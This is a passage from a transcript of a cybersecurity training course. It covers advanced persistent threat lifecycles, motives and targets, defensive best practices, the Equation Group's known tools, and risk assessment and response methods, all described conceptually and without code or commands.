define, and what generic APT lifecycle defined, both Intel and Varonis differ to
some extent.
Now let's look at the APT lifecycle defined by Secvibe. They have 10-phase
process. It starts with research, initial attack, establish foothold, enable persistence,
domain/enterprise resource access, then lateral expansion, privilege escalation,
gathering specific set of data, encrypting and extracting data, and maintaining
persistence. [Video description begins] According to the slide, the first and the
ninth phases in the APT lifecycle are "Research and reconnaissance" and "Encrypt
and exfiltrate data," respectively. [Video description ends]
Now this entire lifecycle Is very concise and crisp as compared to Intel and Varonis
process. However, we cannot say that any one of these process is correct or
incorrect. It is up to the organization to define what an APT lifecycle is. For every
organization, depending on their infrastructure, depending on their processes and
policies, they might define APT lifecycle to be slightly different than the others.
Motives and Targets of an APT
[Video description begins] Topic title: Motives and Targets of an APT. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now discuss about APT motivations. Remember, APTs do not work without
an objective or motivation. Some of these motivations that APTs have are, first one
is military. When you talk about military, the APT group is typically hired by a
nation or a group to attack the military infrastructure of another nation. Next comes
political. There are obvious political reasons why these attacks are carried out by
the APT group. Again, they are hired by one political group or a nation or another
set of people to carry out this attack.
Then comes the corporate espionage. This is, for obvious reason, for stealing the IP
information of a corporate. And this attack is typically funded by either a group of
people or another corporate to carry out this attack. Then comes hacktivism.
Hacktivism could be done for political or social reasons. This type of APT could be
carried out by hiring the APT group. Then comes the financial theft. This type of
APT is typically conducted on banks and financial organizations.
Let's look at some more APT motivations. You have then cyber warfare. This is a
new direction for military warfare. In this type of APT, no blood is shed but a lot of
damage is done to the opponent. China, in 1995, came up with cyber warfare
policy. United States of America created a policy in 2010. Several countries have
now defined a cyber warfare policy. Then comes the sabotage. This is obviously
done for the reasons of destroying one organization or even the infrastructure of
another country.
Then comes the intellectual property theft. This is done to steal intellectual property
of an organization. This type of attack is typically conducted by the APTs when
they are hired by another organization or a group of people. Customer data theft.
This type of attack is conducted by APTs when their target is customer data. This
could be attack to steal the customer information and then sell it out on the dark
web or the underground Internet.
Then comes the competitive advantage. This type of attack is conducted when one
organization wants to steal the information of another organization and gain
competitive advantage.
Let's now look at APT targets. First of all, we have to understand no industry is
spared from APTs. Any industry could be a target. So let's start with chemical. This
is not a typical target, but it is not spared. There have been times when attacks have
happened on the chemical organizations.
Then comes the electronics industries. This type of industry is attacked for
intellectual property. For instance, one organization in the electronic industry might
be coming up with some innovative design of a specific product. The competitor
might ask an APT group to conduct an attack and steal that information. Then
comes the manufacturing. Again, intellectual property is the key target in this
industry.
Next comes the aerospace industry. There is a large scope because the
infrastructure is pretty large, and therefore, it is easy to stay low profile and conduct
the attack. IP, or intellectual property, is the key target in this industry. Automotive
industry is again the target. It is a large industry, and the organizations in this
industry are typically large. So therefore they have huge infrastructure and
intellectual property is one of the key targets. What do we have to remember, larger
the industry, therefore, the scope of the target becomes much larger.
When you talk about healthcare, patient data is one of the key data the healthcare
industry would have. So therefore, patient data becomes the key target. With the
government, political reasons are the main motive. In the energy sector or energy
industry, the key motive is to bring down the infrastructure. In the
telecommunication industry, network and infrastructure are the main target. When
we finally move to the consumer industry, customer data is the key target of the
APTs.
APT Defense Best Practices
[Video description begins] Topic title: APT Defense Best Practices. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now look at APT defense best practices. There are certain best practices that
you would have to follow to ensure that you safeguard yourself from APTs. There
is no set rule what all has to be followed, but what we are trying to show here is
some of the best practices. So for instance, you have to first identify the
weaknesses within your own network. Once you identify these weaknesses, you
have to fix them.
How would you identify these weaknesses? One, you have to do vulnerability
assessment. Secondly, you could also do penetration testing of your infrastructure.
You would be able to find weaknesses and you would also be able to understand
what kind of attacks are possible on your network. Once you have identified these
weaknesses and close them, then you can be pretty sure that there is some level of
security that you have built into your network.
You would also have to detect the traffic. There is a certain type of traffic that
flows in your network. What you have to do is baseline that traffic, understand
what is the typical type of traffic that is flowing. Once that is done, you have to
keep observing the network traffic, over days, weeks, months. This is something
that you have to continuously do. And if there is something that is beyond the usual
network traffic, you can be pretty sure that something is happening on the network
which is not in your favor.
You would also have to do logging of certain events. Therefore, once the logging is
done, then you have to do log analysis. It is advisable that you have a method to
collect these logs in a central place. So for instance, all your servers' devices send
their logs to a centralized place. And therefore, you have to simply look at these
logs from that particular device or application, not having to go to each server and
device to figure out what events are happening.
You also have to build a strong security posture, which means defense in
depth. [Video description begins] On the slide, this point is written as follows:
Build a strong security posture using information security policy. [Video
description ends]
It is not one security device, for instance, a firewall, can safeguard your network.
You will have to have multiple security devices which are backing up each other,
which are creating a strong security posture. This means defense in depth. This
could include a firewall, intrusion detection system, intrusion prevention system,
and various other types of security devices which can strengthen your network.
You will also have to put security governance in practice. When you talk about
security governance, it is a method using which an organization directs and controls
IT security within the organization. The basic fundamental goal of security
governance is to ensure that security strategies of the organizations are aligned with
business objectives. This simply means that you cannot just implement security and
think that you are secure.
You have to monitor them, and you also need to have a accountability framework
to ensure whoever has certain level of responsibility is assigned, they are doing
that. And security governance also brings risk management into the picture, which
means you will have to identify the risks and mitigate them before the hacker
comes and exploits these risks. You would also have to build correlation and threat
management system into the network, which means that you have to identify the
threats, you have to mitigate them, you have to ensure that you are protected.
Methods to Strengthen APT Defenses
[Video description begins] Topic title: Methods to Strengthen APT Defenses. Your
host for this session is Ashish Chugh. [Video description ends]
We will now look at the methods to strengthen the APT defenses. First and the
foremost, you have to assume that you are already compromised. With this thought
process, you need to build your defenses assuming that you have been
compromised and you do not want to be compromised again.
You have to dig deeper into errors and accidents, which means you have to put in a
system like SIEM in place to log incidents. SIEM is a centralized log mechanism in
which multiple devices and servers can log their events. You will have to review
these logs on regular basis and figure out what are the errors that have been logged.
You will also have to monitor the known and its related elements. This means
monitor your network very, very closely. Look out for something that is out of
place from the normal routine.
You will have to broaden the scope, which means you include everything, even the
endpoints. Nowadays, the hackers do not typically go after the firewall or the
servers. Their main targets is the endpoints. Therefore, you have to be very
cautious as endpoints can be the entry point to the network. Therefore, you have to
ensure that you include them in the audit trail. Use nex-gen security solutions. This
means that you have to get rid of the older security devices which are obsolete.
You have to put latest hardware and software and upgrade the security. One thing
you have to remember, the older security devices will not be able to prevent the
latest threats that may happen in your network. Therefore, you have to ensure your
security infrastructure is always updated. This means that you have to upgrade your
hardware that relates to security, and you have to also upgrade the software in the
same context.
You'll also have to automate the investigation and validation process, which means
you have to minimize the manual efforts and attempt to automate as much as
possible. Remember, manual effort causes more errors. And if you automate these
processes, which is investigation and validation, it can give you faster and better
results.
Moving on, you will need to have full visibility of the network traffic. As I
discussed earlier, you'll have to baseline your network traffic. And anything that is
unusual after that which does not match the baseline network traffic, you can
conclude that it is suspicious or malicious traffic. Therefore, that can only be done
if you have full visibility of the network traffic. If you do not know what is
happening on your network, you cannot stop the malicious traffic or even detect it.
Reduce the attack surface. If there is a large attack surface, more attacks are likely
to happen. Therefore, you should reduce the attack surface to as much as possible
and it will minimize the possibility of an attack on your network. Enable deep
logging. We have just discussed you have to put a system like SIEM in place to do
centralized logging and ensure all the errors and incidents are being logged into the
system. This will be a centralized mechanism that you can use to review logs from
servers and various devices.
You have to categorize your assets. You need to know which asset is critical and
which asset is not. Your emphasis should be protecting the critical assets first. That
can only happen if you have done the categorization. Later we will look at what
assets are and how they should be protected.
You have to have defense in depth and breadth. This means your defense in depth
should cover the entire network, all the entry points. There should be multifolds of
defenses that you should have in place; for instance, firewall, intrusion prevention
system, SIEM, intrusion detection system. So there have to be multiple folds of
defenses. This can help you if hacker passes one level of defense, the other level of
defense should be able to catch the hacker.
Dealing with Advanced Persistent Threats
[Video description begins] Topic title: Dealing with Advanced Persistent Threats.
Your host for this session is Ashish Chugh. [Video description ends]
After you've learned about the methods to strengthen the APT defenses, we will
now look at dealing with advanced persistent threats. As we discussed earlier,
APTs are low profile, they are undetectable in most cases, and they are very, very
persistent. So this means that it is not going to be possible for a single security
solution to detect and deal with them.
Now you take an example of an endpoint, which is a desktop. If you have a
antivirus solution or a antimalware solution, it is not going to be able to detect an
APT. The reason is APTs would typically use custom malware, which is unknown
to the antivirus or the antimalware companies. Therefore, the desktop or the system
is infected but for the antivirus or the antimalware solution, there is nothing on the
system that is malicious.
Hence, it is not possible for you to have only a single security solution in place.
You have to have different methods, different mechanisms put in place to ensure
that you are able to catch APTs. Majority of the APT exploits can easily evade
firewalls or the typical antivirus solutions.
Remember, these are custom exploits. These are not something that have been used
widely. Each APT designs a specific exploit to meet a specific purpose. Since the
antivirus or the antimalware companies do not even know about this exploit, they
cannot write a signature to catch it. Because APT exploits are undetectable, they
are still there in the system. Therefore, it could be a possibility that they have been
in the network or the system for many months.
And there will be scenarios where you will not even be able to know what the APT
has done and quietly moved out. For you, your system has been clean for many
months, your antivirus has been updated and a firewall has been activated on the
desktop or the system. As far as you're concerned, you're pretty secure. However,
the APTs can easily evade the firewall or the antivirus solution.
As far as the last point is concerned, APTs will choose the weakest link in the
security chain, which is a human. [Video description begins] The following
information is displayed on screen: APT will choose the weakest link in the security
chain, which is generally a human. [Video description ends] And how humans are
exploited? They are exploited through social engineering. Therefore, social
engineering becomes the base of most of these attacks.
Let's take an example. APT would perform a social engineering attack by sending a
phishing mail, which will be pretty threatening to the employee. Now employee
gets scared and sends out the required information as a response to the phishing
mail. That is the entry point. That is where the APTs will use that information and
make an entry into the network or the user system. Y
ou must also work with the mindset that you have already been breached. Now if
you keep this mindset, you are most likely to tighten up the security on the
network. Think if the breach has already occurred, what was the component on the
network that was breached? You have to work with this mindset and then ensure
there is enough security implemented on the network.
However, what you have to ensure is too many of security controls, which are
unnecessary in some cases, may complicate the infrastructure or the network
architecture. Therefore, you have to implement what is necessary but ensure that
you have been secured from all corners.
The organization must work with the protect first mindset. You have to ensure that
you have to protect yourself first. This is part of a security first mindset where you
have to ensure that security is implemented, it is implemented in the most proper
fashion, it is implemented at all corners of the network. There should not be any
loose corner from where the hacker can get in.
You must also include methods that can give you real-time analytics on the data.
This is because you want to detect the invasive behavior. [Video description
begins] The following information is displayed on screen: You must include realtime advanced security data analytics to detect invasive behavior. [Video
description ends]
So for instance, you can implement intrusion prevention system or intrusion
detection system. The intrusion detection system will only detect the attack but will
not do anything beyond that. Intrusion prevention system, on the other hand, will
not only detect but also prevent the attack.
Beyond that, the data you collate, you will need to have some methods to analyze
that data. Everything in a network must be monitored and this must include the
desktops or the endpoints. In many scenarios where an organization has been
breached, it has been found that endpoint was the entry point for the hackers or the
APTs. Therefore, you have to ensure everything, every single device that exists on
the network is being monitored and it is being monitored proactively.
You must also protect the network perimeter, which means the entry point; the
main entry point to the network must also be protected. And if you do not do that,
then you're leaving the gates open for the APTs to simply walk in and get into the
network.
We will now look at basic, intermediate, and advanced methods of dealing with
advanced persistent threats, or APTs. Now when you talk about basic methods of
dealing with APTs is patching and configuration management. So patching is
simply you patch every system, every device on the network with the latest
updates. As and when updates happen, you are able to patch them using an
automated method.
Your network could include thousands of systems. So it is not possible for you to
manually update each and every system. You could implement a method; like in
Windows environment, you could implement Windows software update services to
update these systems. Configuration management includes that you capture the
configuration of each and every system and then you baseline these systems
accordingly.
Then comes the SIEM, which is Security Information and Event Management
system. This is a method using which you can centrally collate all your logs from
various devices and servers. You should also have advanced malware detection
system. Most organization have a server, which pulls down the updates from the
antimalware company and then distributes those malware to various systems on the
network. This system also has the capability of detecting which particular system
does not run the latest updates.
You should also baseline the network traffic by performing packet
capturing. [Video description begins] The following information is displayed on
screen: Full network packet capturing. [Video description ends] This could be
done with a tool called Wireshark.
You should also have the incident response and forensic investigation methods put
into the place. So for instance, if an incident happens, how should a user respond to
that incident? How should a user report that incident? And to whom that user
should report the incident to? So you'll have to put these kind of processes in place.
Forensic investigation would require, if an incident has already taken place, how do
you figure out what has happened?
Let's now look at the intermediate methods of dealing with APTs. Outboard
gateway consolidation. You need to know how many gateways you have. There
could be multiple entry points and gateways in a network depending on how your
network architecture is laid out. You have to ensure that there is a consolidation.
You have to have continuous monitoring on the network. You cannot simply do
packet capturing once and then do it one month later again. No, you'll have to have
continuous monitoring not only of the network traffic but each and every system on
the network should be monitored.
You should have e-mail scanning. [Video description begins] The following
information is displayed on screen: Proprietary e-mail scanning. [Video
description ends] So any e-mail that is coming in or going out of the network
should be scanned. The reason e-mail scanning falls into the intermediate is just
assume a APT is quietly sneaking out information using e-mail. Even though APTs
generally would not follow this method, but you never know. If they find that email scanning is not happening on the network, then they might even use this
method.
You have to have proactive APT assessments. If your organization does not have
the capability of doing APT assessment, you should hire a third-party vendor to
conduct these assessments and see how vulnerable you are to an APT.
You should also perform regular phishing simulations with the users, send out
phishing e-mails from unknown e-mail addresses and see if the users respond. But
for you to ensure that users do not cater to the phishing e-mails, you'll have to first
train them and ensure that they are aware what a phishing e-mail is and how does it
look like even though there are different variants of a phishing e-mail.
You could also do PC virtualization, which means you have less hardware on the
floor and more of virtual machines running in a server. This can also protect lot of
incidents because virtualization gives you simulation of the actual hardware. You
could also do application whitelisting. You should allow only the application that
have been approved to run on the network or on a desktop or a server. Rest
everything else should be blacklisted. This is required because several users, when
they have an open Internet access, they download installation files from the
Internet.
Now when they do that, because there is nobody watching over them, they simply
install these applications. Now if this application is a malware or contains a
malware, then it is a possibility that not only the desktop but the entire network
might just get infected. Therefore, you should allow only specific applications to
run on the desktops and the servers.
You should segregate the sensitive data, it should not be stored on the same
segment or same network where everybody else is sitting. They should be
segregated, limit the access, put access control in place and if it is too sensitive,
then you ensure that there is no access to this data unless or until it has been
approved by the top management. You should not allow open access to the Internet.
There should be a proxy in place. Proxy will filter out lot of requests that users send
to access a particular site. For example, a user might want to play a game on the
Internet; it's a online game. If you do not have a proxy in between, that user is free
to play that game. This will consume lot of bandwidth. Several games require a
particular component to be downloaded onto the user system, which could also be a
malware. Therefore proxy authentication, if you simply block the game category,
the user will not be able to reach out to that particular website and play the game.
You should also have two-factor authentication put in place, which means it is
something you know, something you are. You could have that kind of combination.
Something you know is the password or a pin, something you are which could be a
biometric authentication, which means either a fingerprinting or retina scan.
Now when you move to the advanced category, one of the best defense in dealing
with APTs is no Internet access. Just assume if your organization does not provide
Internet access to the users. Simple, nobody can go to the Internet, nobody can
download a malware or malware cannot get into your network from any way
possible. Unless somebody brings in a infected USB drive and plugs into the
system, then it is a different story. But from the Internet, nothing can get into the
network.
You should also have credential partitioning. This means the credentials are stored
on a different partition, they are encrypted. You should also have jump servers.
Jump servers allow the request, for instance, you send out a request to the web
server. Now web server only will cater to the requests that are related to its website;
for instance, either on port 80 or port 443. Now if there is any other request that
comes onto the web server, it will be passed on to the jump servers, which will sort
of handle this request and figure out whether it's a malicious request or not.
You should also airgap networks with sensitive data. Airgap networks have
virtually no presence on the network. They are completely isolated, with bare
minimum or absolutely no access to this network. You should also have
counterintelligence operations. Most large companies or organizations have
counterintelligence team, which is well trained, which is geared up to handle any
kind of APT threats. That concludes this particular section.
The Equation Group
[Video description begins] Topic title: The Equation Group. Your host for this
session is Ashish Chugh. [Video description ends]
Earlier in this course, we talked about four different APT groups. One of them was
Equation Group. The Equation Group is considered to be one of the most
sophisticated and advanced APT groups. They're known for using high level of
encryption algorithms and various strategies which makes them hard to detect.
The Equation Group first came into existence in 2001. That is where when they
first made their appearance. This APT group targets a specific victim in one go. So
they do not generally go after many victims at one point of time. They will choose
one particular target. They will study it well, and then they will go after it and
ensure that their motives are met.
The Equation Group also has various malware platforms such as EquationDrug,
GrayFish, TripleFantasy, Equester, Double Fantasy, Fanny. There are various
platforms they have, and these are basically designed to steal information from the
target.
They also use a command & control center to monitor their deployed
malware. [Video description begins] According to the slide, the Equation Group
uses command & control centers to monitor deployed malware. [Video description
ends] So the only way you can monitor a malware is if you have a command &
control center. So the Equation Group, once they deploy a malware on to the target,
they have to monitor it. Accordingly, they shoot out the commands, what the
malware should do, and how it should behave. So therefore, they use a command &
control center.
So the Equation Group has different types of malware. So one of their malware is
designed to alter the hard drive firmware, which makes the hard drive completely
unusable. They also have a worm named Fanny, which can attack air-gapped
networks. Even if you have a isolated network, the Fanny worm is designed to
attack air-gapped or isolated network. This particular worm was created in 2008
and was used to gather information about targets in the Middle East and Asia.
Most of the victims have upgraded to Double Fantasy or EquationDrug
system. [Video description begins] The following information is displayed on
screen: Replaces the good components, such as CD-ROM, with infected
versions. [Video description ends]
The Equation Group, even though they have designed their own malware and
exploit kits, they have shared them with Stuxnet and Flames group. [Video
description begins] According to the slide, the Equation Group has shared its
exploits with Stuxnet and Flame groups. [Video description ends] Now the Stuxnet
is a famous incident that happened few years ago, in which Iranian nuclear facility
was taken down.
Let's now look at some of the key tools used by the Equation Group. So first one is
DoublePulsar backdoor. This is an exploit which targets the Windows-based Server
Message Block, or SMB version 1. Similarly, FuzzBunch framework is designed to
exploit SMB version 2. EternalBlue, EternalSynergy, EternalRomance are designed
to exploit SMB version 1.
Then you have the EquationDrug which is a very complex attack platform
developed by the Equation Group. It supports a module plug-in system, which can
be dynamically uploaded or unloaded by the Equation Group. Then you have
another tool named GrayFish from the Equation Group. This is known to be the
most sophisticated attack platform from the Equation Group. It resides in the
registry, relying on a bootkit to gain execution at the operating system start-up.
Then you have more tools like TripleFantasy, Fanny, Double Fantasy, Equester,
and EquationLaser, which is an older version of the exploit that was created and
used between 2001 to 2004. It mainly worked with Windows 95 and 98.
Let's now look at the victims of the Equation Group around the world. So if you
notice, Asia has the highest infection rate. After that, there is a medium-level
infection rate somewhere in Africa and then low infection rate in the other parts of
the world. However, Asia and some parts of the United States is considered to be
highly infected with the Equation Group malware.
Key Tools Used in APT
[Video description begins] Topic title: Key Tools Used in APT. Your host for this
session is Ashish Chugh. [Video description ends]
We'll now look at the key tools used in APT. The first one is social engineering. It
is the first thing to do before launching an attack. It opens up the gates for an
attack. The APT group could use various methods in social engineering to initiate
the attack. So for instance, a phishing mail could be sent out or spamming could be
used.
Then we come to the exploit kits which are mainly used for designing malware and
conducting various types of attacks. Downloader kits are mainly designed to push
the downloads onto the user systems or the targets. Then we come to drive by
downloads in which a web server includes malicious code that is downloaded to the
target system. Then we have rootkits which is a malware that gives hacker control
over the processes of the target systems.
Then we have the backdoor which provides an easy access to the system and allows
the hacker to bypass the security control. Then there is central controller which is
more like a command and control center, which helps the hackers or the APT
groups to control the malware on the target system.
When you talk about DNS modification, it is to redirect the users to the malicious
websites. So when the user enters a particular URL, the user is actually redirected
to a phishing site or a website which is malicious. APTs also perform routing
modifications. This is to route the traffic to a malicious location rather than the
legitimate location. APTs also use rogue Wi-Fi devices which attract the users to
connect and then the hackers or the APTs capture the traffic from their devices.
Dealing with Risks
[Video description begins] Topic title: Dealing with Risks. Your host for this
session is Ashish Chugh. [Video description ends]
There are different definitions of a risk which can be defined in a generic way or in
the context of information security. Essentially, risk is the potential of losing
something that has a value, which may be high or low based on the
situation. [Video description begins] According to the slide, risk is the potential or
probability of a loss that may occur. [Video description ends]
For example, a system exposed to the Internet has a higher risk of threats as
compared to a system that is not exposed to the Internet. Risk does not exist in
present. It is always in the future. Therefore, it may impact future events. [Video
description begins] According to the slide, risk is focused on the potential of future
events, not the present events. [Video description ends]
In generic sense, a risk is a potential problem that may or may not happen. Another
way to define risk is as a potential of an action or activity that results in an
undesirable outcome or a loss. For example, there is a risk of financial loss due to a
attack conducted by a hacker.
We have to also understand, risk cannot always be eliminated. There will be one
risk or the other depending on the current state of the organization or current state
of the infrastructure or the type of security that you have implemented. There will
be one or more risks that will always be present.
For instance, take an example of a firewall. Now what could be a risk associated
with the single firewall that you have to filter out the incoming and the outgoing
traffic. Now the risk is the firewall can fail. That may or may not happen, but this is
a risk. So how do you avoid that risk? You put a redundant firewall in place. That is
how you can mitigate that particular risk.
Let's now look at some of the risk examples. Risks are unavoidable, and they can
be related from day-to-day life to everything. For example, if you are driving a car
at a very high speed, there are chances that there is an accident will take place. That
is the risk in this situation. Or another example in the context of information
security: If your antivirus application is not updated, then there is a risk that a
malware will get into the system.
Let's look at some of the risk examples. First one is non-compliance to a policy,
which we can assume is a security policy. The risk is that the users may not follow
the security policy. Then you have loss of information or data. A server's hard drive
failing is a risk in this situation, which can cause the loss of information or data.
There is a risk of Denial of Service, or DoS, attack. If you do not protect your
infrastructure, which is the servers and the endpoints or the firewall. if they are not
protected or configured properly, there are chances that there will be a DoS attack.
Then we come to information breach, which is a risk if there is no proper access
control permissions defined. Then we are talking about flood. Flood is also a risk.
If your office is situated in a city which is nearby rivers or the sea or the ocean,
then there are chances that flood may happen. This is a risk.
Let's now look at risk-based frameworks. First of all, when you're talking about
risk-based frameworks, risk-based framework is also known as risk-based
approach. Risk management is an ongoing process that aims at minimizing the risk
and losses to the organization. There are several phases in the risk management
process which cover the risk-based approach. When you follow the risk
management process, you accurately and strategically implement and enable the
organization to improve their decision-making capabilities regarding the risks.
When you are talking about the risk-based framework, which is part of the risk
management process, we have to decide what is important to protect. So in this,
you have to define the boundaries within which the risk-based decisions are made.
You have to identify the assets, you have to categorize them, you have to evaluate
them, and you have to prioritize them. And therefore, you have to ensure you have
concluded or you have narrowed down the assets which are most critical to protect
and which are not. So therefore, you have to identify the threats and vulnerabilities
that impact these particular assets.
Then you have to determine how to protect the assets. In this process, you have to
use the risk management process to examine the impact of threats and
vulnerabilities of the assets in the context of the system environment. And you have
to also determine the risks that are faced by the assets.
This entire set of activities is part of the risk assessment process, which is a critical
step in developing an effective risk management strategy. We at any cost in this
process need to know how to protect our assets from the threats.
Later on, then you move to the risk control method, which is application of controls
to reduce the risks to an organization's data and information systems. This is to
identify which approach is more adequate or appropriate to protect the assets and
the information. You have to prioritize, evaluate, and implement approaches and
risk control measures in the risk assessment process.
Then finally, you have to move to risk monitoring, which is monitor and improve
the controls. There are multiple reasons why would you want to monitor and
improve the controls. When you are monitoring risks, you have to keep track of
identified risks, monitor them, and identify new risks. You have to also determine
the effectiveness of executed risk response plan in reducing risks.
Finally, you have to also ensure that there are risk management policies and
methods that are in compliance to the organization's missions and objectives, which
means that you cannot define a risk management strategy that does not align with
the organization's mission and objective. You have to ensure that everything is on
the single line, your risk management processes and methods are in sync with the
organization's business objective and the vision.
So how do you improve the controls after that? This is an iterative step in which
you will continue to test the controls that you have implemented. And these
controls, I'm being very specific to the security controls. And you have to continue
to evaluate your assets and see if there are vulnerabilities that still exist into the
system. And then based on those vulnerabilities, if they exist, you have to apply
better controls.
Let's now understand the types of risk responses. There are different types of risk
responses that you can have against a particular risk. Therefore, it is up to you,
depending on the situation, how do you want to handle a particular risk or rather
how do you want to respond to a particular risk. It could be risk reduction, risk
avoidance, risk transfer, or risk acceptance.
Let's first look at the risk reduction. This is the most common method to manage
risks. In this method, you will put in control measures to reduce the impact of the
risk. The second method is risk avoidance. When you talk about risk avoidance,
risk avoidance is ideally the best way in some of the situations. In this method, you
will eliminate all those activities or unwanted situations that can expose assets to
risks in the first place. It includes complete elimination of all the vulnerabilities in
the system, which in realistic situation is not possible.
So therefore, risk avoidance is good in some situations but it may not work out in
all situations. Then we talk about risk acceptance. There are times when the cost of
countermeasure is too high and the loss due to a particular risk is relatively less.
Therefore, the organization might simply accept the risk and take no action against
it. Because the loss is relatively very low in comparison to the countermeasure you
are going to put into the place.
However, it is not recommended that you should accept the risk but in certain
situations you would have to do that. And if you do it, then you must also properly
document the risk and review it regularly to ensure that the potential loss is within
the limits of what your organization can accept.
Typically, you would go with risk acceptance when you know the countermeasure
is either very difficult to implement or it is costing too much or it is very time
consuming. After all, the longer the time, more cost you are going to incur.
Therefore, you always look at the cost side of implementing a countermeasure to a
risk. If it is too high and the risk is very low in comparison to that, then you might
as well accept that.
Finally, we are looking at risk transfer. This is a method where the responsibility to
address potential damage due to a risk is transferred to a third party. This could be a
third-party vendor or it could be a third-party service provider, where you simply
pass on the responsibility of addressing the risk.
Let's now look at some of the examples. So first example we would look at is risk
reduction; so how do you reduce the risk. Installing a badge system. Why would
you want to install a badge system at the entry of your building? Because you want
to reduce the risk of unauthorized entry. If you do not have the badge, you cannot
simply walk into the building or your office. But if you have a badge system, then
you have to swipe that and you make an authorized entry.
Another example is installing a firewall. You reduce the risk of network being
attacked if you install a firewall. If you do not install it, then the risk is very high
and probability of an attack taking place on the network is also very high.
Let's now look at the examples of risk avoidance. Let's assume you've been handed
over a complex project. How do you handle that complex project? One is simply
you go ahead and do it, but that is not risk avoidance. The risk avoidance in this
scenario would be you change the scope of a project, reduce the complexity, and
then continue to do the project. [Video description begins] The following
information is displayed on screen: Change the scope of a project – avoid the risk
of getting into a complex project. [Video description ends]
Another example could be buying a commercial product. In this situation, you
avoid the risk of using an open-source product and how are you avoiding the risk in
this scenario? Open-source, typically, do not have regular updates or upgrades or
there is no ownership of a particular entity in most cases, who can own the opensource product. In such a scenario, you do not know where to get the updates. If
you find a bug, you don't know who is going to fix it.
So rather, you avoid this risk and you go for a commercial product of the similar
nature. Now there is an organization that owns the product. You have paid a fee to
buy that product or use that product services. Therefore, you have avoided the risk
of not getting updates or regular upgrades.
Let's now talk about risk acceptance. One of the examples could be approved
deviation from a security policy. Now there is a security policy in the organization.
Everybody has to stick to it, adhere to it. Now if there is a deviation that is
happening, you are taking an approval to deviate from the security policy. That
means you're accepting the risk which may happen due to this particular deviation.
If the management is fine with it, management has okayed the deviation, that
means they are also accepting the risk.
Now let's assume that you have a in-house built application. You find a small bug
but you accept the risk because it is going to take a lot of time for your team to fix
that bug and release a new update on the application. You do not find that time and
the money worth fixing that particular bug. [Video description begins] The
following information is displayed on screen: Will cost a lot to fix a small
vulnerability. [Video description ends]
And more specifically, if you know this particular application is hosted only in the
intranet and it is not visible to the Internet or not hosted on the Internet, then you
know that you can very well accept that risk. The attack cannot happen on that
particular application directly from the Internet. So you are ready to accept that bug
and move ahead with the risk.
Let's now look at risk transfer examples. One of the biggest example would be
purchasing an insurance. So you purchase insurance for your infrastructure. If any
earthquake or anything happens and your infrastructure is destroyed, then you
know there is an insurance. Even though you will not be able to get the data back,
but at least the hardware infrastructure can be purchased back if there is an
insurance. So here you have transferred the risk to that particular infrastructure to a
third party, which is an insurance company.
Let's also assume another scenario where in a project you have come across a
complex task. You do not think that your team has the capability to handle that
complex task, or they may take a longer time to complete the complex task. In this,
you can simply transfer the risk of completing this complex task to a third party.
Risk Assessment to Protect Assets
[Video description begins] Topic title: Risk Assessment to Protect Assets. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now look at risk management framework, which provides the base for risk
management. There are essentially five components of the risk management
framework. These are identify, measure, manage, monitor, report. First you have to
identify the risks, then you have to measure the intensity of the risk, then you have
to manage this risk. This could be done by using one of the four methods. It could
be risk reduction, risk avoidance, risk acceptance, or risk transfer.
Once you have done that, then you have to monitor the risk. And finally, you have
to report the risk. The purpose of risk assessment is to examine the impact of
threats and vulnerabilities of the assets in the context of the system environment
and to determine the estimate of the risk faced by the assets. This step is critical for
the development of effective risk management strategy. [Video description
begins] According to the slide, risk assessment is a method to find risks that can
impact an organization's ability to function or conduct business. [Video description
ends]
We need to know how to protect our assets from the threats. [Video description
begins] According to the slide, risk assessment is a method to identify the critical
assets along with their weakness and threats to them. [Video description ends]
Therefore, we have to identify the preventive measures.
Now one of the question is, why should risk assessment be performed? You have to
understand that it is required to integrate the organization's risk management
objectives with its business goals. So therefore, you have to identify high-risk and
valuable information assets, you need to identify the assets that need protection.
You also need to determine the security initiatives needed to protect the high-risk
valuable assets from threats. [Video description begins] The following information
is displayed on screen: Identify the level of protection for identified assets. [Video
description ends] You also need to determine the current level of security and its
effectiveness. And therefore, if it is not adequate, which means if the security is not
adequate, you'd have to put more security controls in place to protect the assets.
You also have to ensure compliance with the information security laws, guidelines,
and regulations. [Video description begins] The following information is displayed
on screen: Identify the legal and compliance concerns. [Video description ends]
When you talk about risk assessment, there are two types. One is qualitative risk
assessment, another one is quantitative risk assessment. Going forward, we will
look at each type in detail. When you talk about qualitative risk assessment, it
focuses on evaluating the value of each asset and the impact of threats that can
happen on these assets in different scenario.
It is purely based on judgments and likelihoods that are identified in the interviews
with the members across the organization units. These members are interviewed
because they have either experienced these threats or have some knowledge about
them. Qualitative risk assessment does not assign any monetary value to the
components of risk assessment, that are threat and assets.
It exploits different risk possibility scenarios and ranks the threat seriousness using
grade or classes, such as low, medium, high. [Video description begins] According
to the slide, qualitative risk assessment uses a pre-defined rating scale. [Video
description ends]
You would perform the qualitative risk assessment when it is difficult for you to
quantify the assets and threats; for example, when there is a risk to an
organization's brand and reputation. [Video description begins] According to the
slide, qualitative risk assessment does not analyze the risks mathematically but uses
inputs from stakeholders. [Video description ends]
On the other hand, when you talk about quantitative risk assessment, it puts
numbers to risk, which means it deals with numeric values and the money involved.
It attempts to assign a cost to elements and then it requires qualification of all the
elements of the assessment, including asset value, threat occurrence frequency, and
controls. Having said that, it also calculates the probability and impact values of
these threats.
Then you have to determine the annual risk of suffering a loss, which means how
many times a particular threat can occur and how many times can you bear the loss.
You have to calculate that. Quantitative risk assessment also includes ARO, which
is annualized rate of occurrence; SLE, which is single loss expectancy; and ALE,
which is annual loss expectancy. You have to use certain formulas to arrive at a
value which is the output of the quantitative risk assessment.
Let's now look at the pros of qualitative and quantitative risk assessment methods.
Having considered both the methods, the question is which method to employ for
the risk assessment. Both the assessment methods have their own advantages and
disadvantages. Therefore, it becomes the responsibility of the risk management
team to decide which method they want to use. And that decision can only be made
based on the present objectives and resources.
Whatever approach the team uses, the goal is to determine the risk to the
organization so that the correct and cost-effective control measures can be deployed
to protect the important assets from various threats.
Now if you look at the advantages or pros of qualitative risk assessment, it is
simple to calculate, which means that it does not require any complex calculation,
does not use statistical data. So since there are no complex or there are rather no
mathematical equations involved, so the data that is generated does not have any
statistical meaning. So therefore, no statistical data is used in qualitative risk
assessment. Qualitative risk assessment also focuses on implementing controls by
prioritizing time and resources.
Now let's look at quantitative risk assessment's pros. Uses objective statistical data,
we just talked about. It uses various formulas which are based on annualized rate of
